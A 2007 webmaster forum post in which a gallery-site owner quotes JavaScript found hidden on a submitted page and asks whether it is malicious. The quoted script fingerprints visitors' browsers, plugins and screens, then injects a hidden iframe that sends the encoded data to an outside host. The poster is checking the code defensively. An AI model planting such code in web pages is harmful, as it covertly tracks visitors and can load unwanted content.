Thread: Malicious javascript?
View Single Post
Old 2007-03-16, 11:35 AM   #1
Toby
Lonewolf Internet Sales
 
Toby's Avatar
 
Join Date: Mar 2005
Location: Houston
Posts: 4,826
Send a message via ICQ to Toby
Malicious javascript?
A submit to one of my TGPs contained the following javscript at the bottom of the page. I suspect that it's malicious, but want to be sure before I post the domain as a cheater. Can someone that's a bit more adept with javascript confirm my suspicions? Thx
Code:
<script language="javascript">

var xmlHttp;

function nvc(){
var n=navigator;
var p=document;
var c,t,b,j,m,r,y;
var d,x,w;
d=x=w=0;
b=(n.appName=="Netscape" && parseInt(n.appVersion)==4)?"border=\"0\"":"style=\"border:none\"";
if(n.appVersion.indexOf("MSIE")>=0 && n.appVersion.indexOf("Win")>=0){
p.writeln("<s"+"cript language=\"VBScript\">\non error resume next\nn3f8q=0");
for (i=3; i <= 9; i++)
p.writeln("if(IsNull(CreateObject(\"ShockwaveFlash.ShockwaveFlash."+i+"\"))) then dummy=0 else n3f8q="+i+" end if");
p.writeln("</s"+"cript>"); } else eval("var n3f8q=0");
if(n.plugins && n.plugins["Shockwave Flash"]){
t=n.plugins["Shockwave Flash"].description;
n3f8q=parseInt(t.charAt(t.indexOf(".")-1)); }
m=(n.userAgent.substring(0,8)=="Mozilla/")?n.userAgent.substring(8,9):4;
if(m>2)
j=(n.javaEnabled())?1:0;
r=window.top.document.referrer;
if(m>3 && screen){
d=screen.colorDepth;
if(d==0)
d=screen.pixelDepth;
x=screen.width;
w=(p.all)?top.document.body.clientWidth:top.innerWidth; }
y=new Date();
y.setTime(y.getTime()-31536000000);
p.cookie="nvt=1";
c=(p.cookie.indexOf("nvt") != -1)?1:0;
p.cookie="nvt=1; expires="+y.toGMTString();

url="?site=30318;t=lb14;"+"fv="+n3f8q+";js="+j+";cs="+c+";ref=;cd="+d+";sx="+x+";wx="+w+";jss=1;r="+Math.random();



        httpreq();

        url="/crypt.pl?string="+escape(url);
	
//        alert(url);
        xmlHttp.onreadystatechange = statechange;
        xmlHttp.open("GET", url,false);
        xmlHttp.send(null);

	var vysledok=xmlHttp.responseText;

//	alert(vysledok);

p.write("<iframe src=\"http://imgs.sk/index.pl?obr=1167756656184-5661.jpg&req="+vysledok+"\" style=\"display: none\"></iframe>");
//p.write(vysledok);

}


function httpreq(){
  if(window.ActiveXObject){
    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
  }
  else if(window.XMLHttpRequest){
      xmlHttp = new XMLHttpRequest();
  }
}


function statechange(){
    do_somtin();
}

nvc();
</script>
Toby is offline   Reply With Quote